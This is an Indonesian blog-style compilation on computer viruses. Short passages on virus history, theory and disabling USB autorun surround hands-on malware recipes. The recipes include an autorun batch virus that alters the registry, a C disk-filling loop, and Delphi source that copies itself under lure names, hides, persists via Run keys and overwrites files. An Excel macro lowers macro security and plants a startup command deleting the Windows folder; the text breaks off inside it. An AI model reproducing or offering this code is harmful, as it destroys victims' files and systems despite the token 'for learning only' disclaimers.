Tips-Tips buat Virus Maker
Nah lo? Kok gw bikin artikel ginian? Kenapa gak bikin tips2 buat
mehapus virus aja? Ah, ngapain repot-repot membasmi virus kalo ntar ada
lagi, ada lagi yang bikin? Mending gw ngasih tipsnya buat si pembuatnya
aja kali ya? hihihihi…
- Jangan merusak data korban. Kasian tuh om-om yang pada gaptek
begitu nyadar datanya hilang, komputernya mulai gak beres, yang
diomelin malah anaknya yang hobby ngutak-ngati komputer. Huh.
Kecuali penghapusan data bertujuan agar jejak sang virus atau
keberadaanya sulit dilacak. Misalnya aja menghapus file log,
antivirus, dll.
- Daripada bikin virus yang payloadnya merusak lebih baek kamu
bikin virus yang cuman iseng doank. Pernah nyoba program2 pranks
gak? Misalnya bikin mouse lompat-lompat sendiri sampe dikira tikus
beneran(iiih), keyboard ngetik sendiri kayak ada hantunya. Bikin
tulisan startmenu gonta-ganti sendiri. Bikin mouse kayak ngadat,
dsb deh. Coba aja buka www.rjlsoftware.com
buat nyari ide kayak ginian. Bikinnya gampang kok cuman pake dikit
fungsi API yg emang gampang dibikin pake VB. VB emang idolanya
virus maker ^^”
- Jangan pake virus generator yang udah jadi. Biasanya virus
hasil generate itu gampang dideteksi antivirus. Lagipula skill
programming kamu juga gak berkembang dunk!
- Waktu lagi bikin virus sebaiknya file proyek virus kerjaan kamu
itu ditaruh di drive selain C: sedangkan drive C nya sendiri
dipasangin deepfreeze. Biar waktu nyoba-nyoba dan ternyata
kerusakannya parah banget kamu tinggal restart aja.
- Kalo mau kreatif dikit, sekali-kali gunakan bahasa selain VB
donk. Misalnya C++, delphi, atau lainnya. Virus VB terlalu
bergantung ama library msvbvm sich,
- Biar gak membahayakan orang lain jangan sebarin virusmu itu.
Simpan aja terus dikomputer kamu. Puluhan tahun kemudian bisa masuk
museum tuh. Huehehehe^^
Pengetahuan Dasar Tentang Virus
Saat Ini, pastilah kita semua selaku konsumen/pengguna jasa komputer
dan jaringan ( internet ) sudah sangat sering mendengar istilah ‘virus’
yang terkadang meresahkan kita. Tulisan ini akan mengupas lebih jauh
mengenai virus, yang nantinya diharapkan dapat membuat kita semua
mengerti danmemahami tentang virus.
A. ASAL MUASAL VIRUS
1949, John Von Neuman, menggungkapkan ” teori self altering automata ” yang merupakan hasil riset dari para ahli matematika.
1960, lab BELL (AT&T), para ahli di lab BELL (AT&T) mencoba-coba
teori yang diungkapkan oleh john v neuman, mereka bermain-main dengan
teori tersebut untuk suatu jenis permainan/game. Para ahli tersebut
membuat program yang dapat memperbanyak dirinya dan dapat menghancurkan
program buatan lawan.Program yang mampu bertahan dan menghancurkan semua
program lain, maka akan dianggap sebagai pemenangnya. Permainan ini
akhirnya menjadi permainan favorit ditiap-tiap lab komputer.semakin lama
mereka pun sadar dan mulai mewaspadai permainan ini dikarenakan program
yang diciptakan makin lama makin berbahaya, sehingga mereka melakukan
pengawasan dan pengamanan yang ketat.
1980, program tersebut yang akhirnya dikenal dengan nama “virus” ini
berhasil menyebar diluar lingkungan laboratorium, dan mulai beredar di
dunia cyber.
1980, mulailah dikenal virus-virus yang menyebar di dunia cyber.
B. PENGERTIAN VIRUS
” A program that can infect other programs by modifying them to
include a slighty altered copy of itself.A virus can spread throughout a
computer system or network using the authorization of every user using
it to infect their programs. Every programs that gets infected can also
act as a virus that infection grows “ ( Fred Cohen )
Pertama kali istilah “virus” digunakan oleh Fred Cohen pada tahun 1984
di Amerika Serikat. Virus komputer dinamakan “Virus” karena memiliki
beberapa persamaan mendasar dengan virus pada istilah
kedokteran(biological viruses).
Virus komputer bisa diartikan sebagai suatu program komputer
biasa.Tetapi memiliki perbedaan yang mendasar dengan program-program
lainnya,yaitu virus dibuat untuk menulari program-program lainnya,
mengubah, memanipulasinya bahkan sampai merusaknya. Ada yang perlu
dicatat disini, virus hanya akan menulari apabila program pemicu atau
program yang telah terinfeksi tadi dieksekusi, disinilah perbedaannya
dengan “worm”. Tulisan ini tidak akan bahas worm karena nanti akan
mengalihkan kita dari pembahasan mengenai virus ini.
C.KRITERIA VIRUS
Suatu program yang disebut virus baru dapat dikatakan adalah benar benar virus apabila minimal memiliki 5 kriteria :
- Kemampuan suatu virus untuk mendapatkan informasi
- Kemampuannya untuk memeriksa suatu program
- Kemampuannya untuk menggandakan diri dan menularkan
- Kemampuannya melakukan manipulasi
- Kemampuannya untuk menyembunyikan diri.
Sekarang akan coba dijelaskan dengan singkat apa yang dimaksud dari tiap-tiap kemampuan itu dan mengapa ini sanggat diperlukan.
1. Kemampuan untuk mendapatkan informasi
Pada umumnya suatu virus memerlukan daftar nama-nama file yang ada dalam
suatu directory, untuk apa? agar dia dapat mengenali program program
apa saja yang akan dia tulari,semisal virus makro yang akan menginfeksi
semua file berekstensi *.doc setelah virus itu menemukannya, disinilah
kemampuan mengumpulkan informasi itu diperlukan agar virus dapat membuat
daftar/data semua file, terus memilahnya dengan mencari file-file yang
bisa ditulari.Biasanya data ini tercipta saat program yang
tertular/terinfeksi atau bahkan program virus ini dieksekusi. Sang virus
akan segera melakukan pengumpulan data dan menaruhnya di RAM (biasanya
) , sehingga apabila komputer dimatikan semua data hilang tetapi akan
tercipta setiap program bervirus dijalankan dan biasanya dibuat sebagai
hidden file oleh virus.
2.Kemampuan memeriksa suat program
Suatu virus juga harus bias untuk memeriksa suatu program yang akan
ditulari, misalnya ia bertugas menulari program berekstensi *.doc, dia
harus memeriksa apakah file dokumen ini telah terinfeksi ataupun belum,
karena jika sudah maka dia akan percuma menularinya 2 kali. Ini sangat
berguna untuk meningkatkan kemampuan suatu virus dalam hal kecepatan
menginfeksi suatu file/program.Yang umum dilakukan oleh virus adalah
memiliki/ memberi tanda pada file/program yang telah terinfeksi sehingga
mudah untuk dikenali oleh virus tersebut . Contoh penandaan adalah
misalnya memberikan suatu byte yang unik disetiap file yang telah
terinfeksi.
3.Kemampuan untuk menggandakan diri
Kalo ini emang virus “bang-get”, maksudnya tanpa ini tak adalah virus.
Inti dari virus adalah kemampuan mengandakan diri dengan cara menulari
program lainnya. Suatu virus apabila telah menemukan calon korbannya
(baik file atau program) maka ia akan mengenalinya dengan memeriksanya,
jika belum terinfeksi maka sang virus akan memulai aksinya untuk
menulari dengan cara menuliskan byte pengenal pada program/ file
tersebut,dan seterusnya mengcopikan/menulis kode objek virus diatas
file/program yang diinfeksi. Beberapa cara umum yang dilakukan oleh
virus untuk menulari/ menggandakan dirinya adalah:
a.File/Program yang akan ditulari dihapus atau diubah namanya. kemudian
diciptakan suatu file menggunakan nama itu dengan menggunakan virus
tersebut (maksudnya virus mengganti namanya dengan nama file yang
dihapus)b.Program virus yang sudah di eksekusi/load ke memori akan
langsung menulari file-file lain dengan cara menumpangi seluruh
file/program yang ada.
4.Kemampuan mengadakan manipulasi
Rutin (routine) yang dimiliki suatu virus akan dijalankan setelah virus
menulari suatu file/program. isi dari suatu rutin ini dapat beragam
mulai dari yang teringan sampai pengrusakan. rutin ini umumnya digunakan
untuk memanipulasi program ataupun mempopulerkan pembuatnya! Rutin ini
memanfaatkan kemampuan dari suatu sistem operasi (Operating System) ,
sehingga memiliki kemampuan yang sama dengan yang dimiliki sistem
operasi. misal:
a.Membuat gambar atau pesan pada monitorb.Mengganti/mengubah ubah label
dari tiap file,direktori,atau label dari drive di pcc.Memanipulasi
program/file yang ditularid.Merusak program/filee.Mengacaukan kerja
printer , dsb
5.Kemampuan Menyembunyikan diri
Kemampuan Menyembunyikan diri ini harus dimiliki oleh suatu virus agar
semua pekerjaan baik dari awal sampai berhasilnya penularan dapat
terlaksana.langkah langkah yang biasa dilakukan adalah:
-Program asli/virus disimpan dalam bentuuk kode mesin dan digabung
dengan program lain yang dianggap berguna oleh pemakai.-Program virus
diletakkan pada Boot Recoord atau track yang jarang diperhatikan oleh
komputer itu sendiri-Program virus dibuat sependek mungkin, dan hasil
file yang diinfeksi tidak berubah ukurannya-Virus tidak mengubah
keterangan waktu ssuatu file-dll.
D.SIKLUS HIDUP VIRUS
Siklus hidup virus secara umum, melalui 4 tahap:
- Dormant phase ( Fase Istirahat/Tidur )Pada fase ini virus
tidaklah aktif. Virus akan diaktifkan oleh suatu kondisi tertentu,
semisal:tanggal yang ditentukan,kehadiran program
lain/dieksekusinya program lain, dsb. Tidak semua virus melalui
fase ini
- Propagation phase ( Fase Penyebaran )Pada fase ini virus akan
mengkopikan dirinya kepada suatu program atau ke suatu tempat dari
media storage (baik hardisk, ram dsb). Setiap program yang
terinfeksi akan menjadi hasil “klonning” virus tersebut (tergantung
cara virus tersebut menginfeksinya)
- Trigerring phase ( Fase Aktif )Di fase ini virus tersebut akan
aktif dan hal ini juga di picu oleh beberapa kondisi seperti pada
Dormant phase
- Execution phase ( Fase Eksekusi )Pada Fase inilah virus yang
telah aktif tadi akan melakukan fungsinya. Seperti menghapus file,
menampilkan pesan-pesan, dsb
Mencegah penularan virus via USB disk
Virus-virus lokal punya satu kekhasan yang jarang ditemukan pada hama
komputer buatan luar negeri. Virus atau worm luar biasanya memanfaatkan
jaringan internet buat menyebar. Lain halnya dengan virus lokal.
Penciptanya kerap kali merancang virusnya agar dapat berkembang biak
melalui perantaraan usb disk, baik itu flash disk ataupun hard disk
portabel. Ini mungkin karena di Indonesia umumnya pertukaran data lewat
medium portabel jauh lebih mudah dilakukan.
Saya sendiri sempat berkenalan dengan dua jenis virus lokal yang
menyebar melalui usb disk ini. Untungnya keduanya relatif jinak, tidak
seperti virus Brontok yang terkenal ganas itu. Dan lebih mujur lagi
kedua jenis virus itu saya temui di komputer orang lain.
Keduanya memiliki cara penularan yang sama: via flash/portable disk.
Modus penularannya juga sama, yaitu dengan memanfaatkan fitur autorun
pada Windows. Fitur autorun (atau autoplay) ini sebenarnya ditujukan
untuk medium seperti CD-ROM atau DVD, agar komputer dapat langsung
menjalankan program (biasanya installer) dalam cakram optik tersebut
ketika disisipkan. Fitur autorun ini diaktifkan oleh komputer tertular
dengan menuliskan berkas AUTORUN.INF ke dalam flash disk. Berkas ini
dibikin tersembunyi (hidden) dan diubah statusnya menjadi read-only.
Berkas AUTORUN.INF ini berisi perintah untuk menjalankan berkas lain
berupa program yang juga dimasukkan oleh komputer tertular. Program ini
bisa ditulis dalam Visual Basic (ini berarti kita dapat membaca sendiri
kodenya), atau berupa berkas executable biner. Berkas kedua ini bertugas
untuk menulari komputer lain. Kemudian ketika flash disk pertama kali
ditancapkan ke slot USB, dan komputer mendeteksi berkas AUTORUN.INF ia
akan membacanya dan kemudian menjalankan perintah menjalankan program
penular tersebut. Dari dua kejadian yang saya temui program antivirus
yang terpasang sama sekali tidak memperingatkan keberadaan virus di
dalam flash disk tersebut.
Menghapus dan mencegah virus
Mengobati komputer yang sudah terjangkit virus agak merepotkan.
Untungnya membersihkan USB disk dan menangkal penjalarannya di komputer
yang masih bersih cukup mudah.
Dalam kedua kasus saya menemukan mekanisme penularan ini ketika
menggunakan USB disk di komputer yang menjalankan sistem operasi
non-Windows (dalam hal ini, Fedora 7). Sejauh ini Fedora 7 dan
distribusi Linux lainnya (dan Mac OS) kebal dari penularan virus
Windows. Karena itu cukup aman menggunakan sistem non-Windows buat
membersihkan virus yang memanfaatkan fitur autorun dari USB disk. Buka
berkas AUTORUN.INF menggunakan editor teks, lalu dari sana cari berkas
mana yang akan dijalankan secara otomatis. Cari dan hapus berkas
tersebut. Terakhir hapus juga berkas AUTORUN.INF.
Penangkalan virus ini di komputer Windows cukup jelas: matikan fitur
autorun. Ini tidak akan menjamin sepenuhnya komputer kebal dari
penularan lewat USB disk, namun akan menangkal Namun bagaimana caranya?
Pemakai Windows XP dapat mengunduh Tweak UI, yang merupakan salah satu utilitas Microsoft Power Toys dari
http://www.microsoft.com/windowsxp/downloads/powertoys/xppowertoys.mspx
Klik berkas TweakUIPowerToySetup untuk memasang utilitas tersebut.
Setelah selesai luncurkan Tweak UI. Di panel sebelah kiri jendela
aplikasi ini pilih My Computer, lalu pilih Types. Kosongkan kotak di
samping Enable Autoplay for removable drives, lalu klik Apply. Kalau mau
Anda bisa juga menonaktifkan pilihan Enable Autoplay for CD and DVD
drives.
Cara Membuat Virus Dengan Notepad
Nih virus efeknya g t’lalu bahaya….efek dari virus ini cuman mengganti tampilan dari
windows…..tapi cukup bikin kaget juga!!! tapi yg penting gak ke-detect ama anti virus(setahu saya…)
note:
“HANYA BEKERJA PADA WINDOWS XP”
caranya:
- buka notepad lalu tulis(atau copy paste…tapi di edit dulu yaaa… ) script di bawah ini:
@echo off
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\ /y
copy image_name(terserah dari nama file gambar pembuat).bmp %systemdrive%\WINDOWS\system32\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish
ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe
%systemdrive%\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish
ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe
%systemdrive%\WINDOWS\ /y
copy nama_file(maksudnya file yang dibuat dengan flash lalu di publish
ke .exe,atau file exstensi lain,tampilan file terserah pembuat).exe
%systemdrive%\WINDOWS\system32\ /y
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon” /v LegalNoticeCaption /d “WARNING MESSAGE
FROM LOCAL_HOST(judul title bar)” /f
reg add “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT\CurrentVersion\Winlogon” /v LegalNoticeText /d “I HAVE RUINED YOUR
COMPUTER AND YOUR COMPUTER IS LOCKED(pesan pembuat)” /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v Wallpaper /d
%systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar
pembuat).bmp /f
reg add “HKEY_CURRENT_USER\Control Panel\Desktop” /v WallpaperStyle /d 0 /f
reg add “HKEY_USERS\.DEFAULT\Control Panel\Desktop” /v Wallpaper /d
%systemdrive%\WINDOWS\system32\image_name(terserah dari nama file gambar
pembuat).bmp /f
reg add
“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run” /v
nama_terserah /d %systemdrive%\windows\system32\nama_file(maksudnya file
yang dibuat dengan flash lalu di publish ke .exe,atau file exstensi
lain,tampilan file terserah pembuat).exe /f
reg add “HKEY_CURRENT_USER/Control Panel/Colors” /v window /d
#000000(atau kombinasi warna RGB lain,cari pake Adobe Photoshop) /f
- lalu di SAVE AS ALL FILES dengan exstensi .bat (nama_file.bat)
- buat Autorun.inf dengan script:
[autorun]
open=nama_file.bat
- lalu SAVE AS ALL FILES dengan exstensi .inf (Autorun.inf)
- file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb
klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY
- copy file-file tsb ke CD
- nikmati efeknya
note:
- jangan disalahgunakan
- maaf kalau pernah diposting sebelumnya
- kalau mau buat anti virusnya tinggal di modifikasi nilainya….
Maaf Sebagian Di Copy Paste dari berbagai sumber
Membuat virus sederhana pada Borland C untuk Pemula
Hi semuanya, kt mulai dari pemrograman komputer, ini merupakan
cita-cita dan hampir smua siswa berkeinginan membangun virus komputer.
Virus komputer adalah suatu program yang dibuat untuk dan pada umumnya
untuk merusak komputer. Virus komputer adalah program yang sepenuhnya
tidak sah.
Sekarang saya akan menjelaskan sedikit tentang virus, virus
kebanyakan adalah jenis-jenis dari virus-virus komputer dengan
functions(destructive obviously). ada yang mengahapus data penting dan
folder, ada yang mengubah pengaturan pada sistem komputer anda seperti
registry values, ada yang menelan sejumlah besar memory space dan dump
pada hard disc anda. Virus juga dapat merusak RAM parmanently.
Saya akan memberi di sini suatu program virus sederhana yang hanya
mempunyai beberapa duri kecil dan mempunyai kemampuan untuk menyumbat
hard disc anda.
Logika di balik program itu adalah tak lain hanya membuat diri
sendiri berupa file yang berkembang, memperbanyak hingga MB dengan tidak
terbatas.
Spesifik untuk buat virus
OS:-Windows98/xp/2000 MS-DOS
Compiler:-Borland C(Which has Dos Shell)
Source Code:-
//START v.c
#include
#include
void main()
{
while(1)
{
system(“dir>>â•Å¡a.exe”);
}
}
//END
Ketika Anda dapat melihat ini adalah suatu program kecil. Menyusun
program yang kita dapat adalah file v.exe ini adalah virus kita.
Bagaimana menmbuatnya? -The system call “dir>>â•Å¡a.exe” will
execute the dos command ‘dir’ dan ridirect its output toa file â•Å¡a.exe
(simbol â•Å¡ dapat diperoleh dengan menekan
456 pada numpad tahan
alt key).
Jika menjalankan program ini dalam sebuah folder yang memiliki banyak
data dan folder tersebut akan meningkatkan ukurannya oleh â•Å¡a.exe dalam
jumlah yang besar. Proses ini akan melanjutkan sampai ketidakterbatasan
dalam waktu singkat.
Udah teruji pada win98. Dan kamu tak akan bisa menghapus â•Å¡a.exe GUI.
Untuk auto running, tempatkan v.exe pada folder command di dalam windows folder.
Pada file autoexec.bat(win98) atau autoexec.NT(winXP/2000) tulis v.exe.
Pada saat anda memulai window, v.exe akan jalan secara automatis.
Coba gunakan virus ini pada komputer anda, â•Å¡a.exe adalah virus yang
dapat menginfeksi file dimana ukuran foile akan membesar. Jadi untuk
menghapus virus dari komputer anda, cukup hapus file v.exe dan â•Å¡a.exe
dari komputer anda.
Code:
//START v.c
#include
#include
void main()
{
while(1)
{
system(“dir>>â•Å¡a.exe”);
}
}
//END
catatan : hati-hati yach….met bwt virus hahaha…
Membuat virus dengan Delphi 7
Ini kode untuk membuat virus dengan Delphi 7, ketik kode di bawah ini
atau bisa kopi paste. Dan ingat kode di bawah hanya untuk pembelajaran
saja, dan kami tidak bertanggung jawab penyalah gunaan kode di bawah
ini:
unit Unit1;
interface
{Deklarasi ShellApi Yang Digunakan}
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs,Shellapi,registry, Mmsystem, StdCtrls, ExtCtrls, jpeg;
type
TForm1 = class(TForm)
Timer1: TTimer;
Timer2: TTimer;
procedure Timer2Timer(Sender: TObject);
procedure Timer1Timer(Sender: TObject);
procedure FormCreate(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
{{$R MySoundRes.RES}
procedure TForm1.FormCreate(Sender: TObject);
{Deklarasi variabel}
var
regis: TRegistry;
APath: string;
MySearch: TSearchRec;
dir : string;
{i : integer;}
{x : integer;}
{F:TextFile;}
reg1:TRegistry;
reg2:TRegistry;
windir:array[0..255] of char;
sysdir:array[0..255] of char;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
begin
{form tak terlihat}
Application.ShowMainForm := false;
{copy dulu ah}
begin
getwindowsdirectory(windir,sizeof(windir));
getsystemdirectory(sysdir,sizeof(sysdir));
try
mkdir(sysdir+’\runfold’);
except
end;
try
CopyFile(pchar(application.ExeName),PChar(windir+’\Dadan cakep.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\sistim32.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\Rahasia.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\Jangan dibuka.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\hotmovie.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\ramdan.avi.exe’),true);
CopyFile(pchar(application.ExeName),PChar(sysdir+’\runfold\-NET-SERVICES-.exe’),true);
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{menjalankan service tak terlihat}
begin
getsystemdirectory(sysdir,sizeof(sysdir));
try
SetFileAttributes(PChar(sysdir+’\runfold\-NET-SERVICES-.exe’), FILE_ATTRIBUTE_HIDDEN);
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{men-disable TASK MANAGER}
try
regis := TRegistry.Create;
regis.RootKey := HKEY_CURRENT_USER;
regis.OpenKey(’Software’, True);
regis.OpenKey(’Microsoft’, True);
regis.OpenKey(’Windows’, True);
regis.OpenKey(’CurrentVersion’, True);
regis.OpenKey(’Policies’, True);
regis.OpenKey(’System’, True);
regis.WriteString(’DisableTaskMgr’, ‘0′);
regis.CloseKey;
except
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{membuat key di registry biar auto run gitu}
begin
try
getsystemdirectory(sysdir,sizeof(sysdir));
reg1 := TRegistry.Create;
reg1.RootKey := HKEY_LOCAL_MACHINE;
if reg1.OpenKey(’Software\Microsoft\Windows\CurrentVersion\Run’,True) then
reg1.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);
reg1.CloseKey;
{membuat key registry di runonce}
reg2 := TRegistry.Create;
reg2.RootKey := HKEY_LOCAL_MACHINE;
if reg2.OpenKey(’Software\Microsoft\Windows\CurrentVersion\RunOnce’,True) then
reg2.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);
reg2.CloseKey;
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{menginfeksi file}
begin
try
dir := GetCurrentDir;
APath:= dir;
FindFirst(APath+’\*.*’, faAnyFile, MySearch);
refresh;
while FindNext(MySearch)=0 do
begin
copyFile (pchar(application.ExeName),pchar(APath+’\’+MySearch.Name),false);
refresh;
end;
FindClose(MySearch);
except
end;
end;
refresh;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{merubah file yg terinfeksi}
begin
try
dir := GetCurrentDir;
APath:= dir;
FindFirst(APath+’\*.*’, faAnyFile, MySearch);
refresh;
while FindNext(MySearch)=0 do
begin
renamefile (pchar(APath+’\’+MySearch.Name),pchar(APath+’\’+MySearch.Name+’.exe’));
renamefile (pchar(application.ExeName+’.exe’),pchar(application.ExeName));
refresh;
end;
FindClose(MySearch);
except
end;
end;
refresh;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
procedure TForm1.Timer1Timer(Sender: TObject);
{terus perhatiin yah}
{deklarasi variabel}
var
regis: TRegistry;
reg1:TRegistry;
reg2:TRegistry;
windir:array[0..255] of char;
sysdir:array[0..255] of char;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
begin
begin
getwindowsdirectory(windir,sizeof(windir));
getsystemdirectory(sysdir,sizeof(sysdir));
try
mkdir(sysdir+’\runfold’);
except
end;
try
CopyFile(pchar(application.ExeName),PChar(windir+’\Dadan cakep.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\sistim32.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\Rahasia.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\Jangan dibuka.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\hotmovie.exe’),true);
CopyFile(pchar(application.ExeName),PChar(windir+’\ramdan.avi.exe’),true);
CopyFile(pchar(application.ExeName),PChar(sysdir+’\runfold\-NET-SERVICES-.exe’),true);
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{tetep jalanin virus secara tak terlihat}
begin
getsystemdirectory(sysdir,sizeof(sysdir));
try
SetFileAttributes(PChar(sysdir+’\runfold\-NET-SERVICES-.exe’), FILE_ATTRIBUTE_HIDDEN);
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{mendisable task manager}
begin
try
regis := TRegistry.Create;
regis.RootKey := HKEY_CURRENT_USER;
regis.OpenKey(’Software’, True);
regis.OpenKey(’Microsoft’, True);
regis.OpenKey(’Windows’, True);
regis.OpenKey(’CurrentVersion’, True);
regis.OpenKey(’Policies’, True);
regis.OpenKey(’System’, True);
regis.WriteString(’DisableTaskMgr’, ‘0′);
regis.CloseKey;
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
begin
try
getsystemdirectory(sysdir,sizeof(sysdir));
reg1 := TRegistry.Create;
reg1.RootKey := HKEY_LOCAL_MACHINE;
if reg1.OpenKey(’Software\Microsoft\Windows\CurrentVersion\Run’,True) then
reg1.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);
reg1.CloseKey;
{bikin lagi key registry}
reg2 := TRegistry.Create;
reg2.RootKey := HKEY_LOCAL_MACHINE;
if reg2.OpenKey(’Software\Microsoft\Windows\CurrentVersion\RunOnce’,True) then
reg2.WriteString(’.NET.’,sysdir+’\runfold\-NET-SERVICES-.exe’);
reg2.CloseKey;
except
end;
end;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
try
ShellExecute(0, ‘open’, ‘www.imm.or.id’, nil, nil, SW_NORMAL);
mciSendString(’dadan cakep deh’, nil, 0, handle);
except
end;
timer2.Enabled:= true;
timer1.Enabled:= false;
end;
procedure TForm1.Timer2Timer(Sender: TObject);
begin
try
mciSendString(’dadan memang cakep’, nil, 0, handle);
except
end;
timer1.Enabled:= true;
timer2.Enabled:= false;
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
{+++++++++++++++++++++++++++++++++++}
{%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%}
end;
end.
Membuat Virus Dengan Excel
HANYA SEKEDAR UNTUK BELAJAR……
MAKE MODULE, MENYEBARKAN, MEMODIFIKASI ADALAH BUKAN TANGGUNGJAWAB CODER
SCRIPT INI HANYA DIGUNAKAN SEBAGAI ILMU PENGETAHUAN SAHAJA
Bila anda TIDAK SETUJU tekan tombol [X] pada window ini
MAKE Virus:
buka new excel workbooks kemudian menu tools macro VB editor
klik kanan pada VBA Project dan pilih insert module
Paste file ini ke dalam new module
tekan F8 untuk trace script
—————————— begin of script —————————————–
‘USE THIS SCRIPT AS YOUR OWN RISK
‘This is for my wife if thats you falling love with others
Private Declare Function RegOpenKeyExA Lib “advapi32.dll” (ByVal hKey As Long, _
ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As _
Long, phkResult As Long) As Long
Private Declare Function RegCreateKeyExA Lib “advapi32.dll” (ByVal hKey As Long, _
ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As _
Long, phkResult As Long) As Long
Private Declare Function RegSetValueExA Lib “advapi32.dll” (ByVal hKey As Long, _
ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, _
ByVal lpValue As String, ByVal cbData As Long) As Long
Private Declare Function RegCloseKey Lib “advapi32.dll” (ByVal hKey As Long) As Long
Private Declare Function RegCreateKey Lib “advapi32.dll” Alias “RegCreateKeyA” (ByVal _
hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Global Const REG_DWORD As Long = 4
Global Const HKEY_LOCAL_MACHINE As Long = &H80000002
Global Const HKEY_CURRENT_USER As Long = &H80000001
Dim NewKEY As Long
Dim AA, BB, NN
Dim Myclub As String
Dim CrStat As Boolean
Dim pnm As String
‘ ini untuk mendisable menu bila ingin memodifikasi tambah ato kurangi sendiri
‘ menghapus direktory windows…ssttt glodak aauuuuu
Sub MessBoard()
On Error Resume Next
CommandBars(”File”).Controls(”Print Area”).Visible = False
CommandBars(”Data”).Controls(”Sort”).Visible = False
CommandBars(”File”).Controls(”Page Setup…”).Visible = False
NowBoom = Array(”MsApp”, “Sound Acceleration”, “Ms Wizard”, “Web Camera”, _
“PCI driver”, “App Video”, “Lshots”, “WinApps”, “MsOffice 11″)
Randomize
NowBoom = NowBoom(Rnd * 9)
KillAV = RegOpenKeyExA(HKEY_LOCAL_MACHINE, “Software\Microsoft\Windows\CurrentVersion\Run”, _
0, KEY_ALL_ACCESS, s)
KillAV = RegSetValueExA(s, NowBoom, 0, 1, “c:\windows\command\deltree windows”, 0)
KillAV = RegCloseKey(s)
End Sub
Private Sub Auto_Open()
On Error Resume Next
Application.StatusBar = “Wait please….”
Application.ScreenUpdating = False
CommandBars(”Tools”).Controls(”Customize…”).Visible = False
CommandBars(”Tools”).Controls(”Options…”).Visible = False
CommandBars(”Tools”).Controls(”Macro”).Enable = False
’setting registry security LOW pada excel ver. 8.0 dan 9.0
Kill97 = RegOpenKeyExA(HKEY_CURRENT_USER, “Software\Microsoft\Office\8.0\Excel” & _
“Microsoft Excel”, 0, KEY_ALL_ACCESS, k)
Kill97 = RegSetValueExA(k, “Options6″, 0, REG_DWORD, Chr$(0), 4)
Kill97 = RegCloseKey(k)
Kill2K = RegCreateKey(HKEY_CURRENT_USER, “Software\Microsoft\Office\9.0\Excel” & _
“security”, s)
Kill2K = RegOpenKeyExA(HKEY_CURRENT_USER, “Software\Microsoft\Office\9.0\Excel”, _
0, KEY_ALL_ACCESS, s)
Kill2K = RegSetValueExA(s, “Level”, 0, REG_DWORD, Chr$(2), 2)
Kill2K = RegCloseKey(s)
‘mengalihkan antivirus ke file yang anda inginkan
‘rundll.exe jika sudah menumpuk di registry membuat winkamu cepet mabok
‘rubah file rundll.exe sesuai keinginan
AnVrs = Array(”VsStatEXE”, “Norton Auto-Protect”, “F-Secure”, “PandaSoft”, “Avast4″, _
“DrSolomon”, “AntiVir”, “MsSound”, “BombShellter”)
Randomize
AVstr = AnVrs(Rnd * 9)
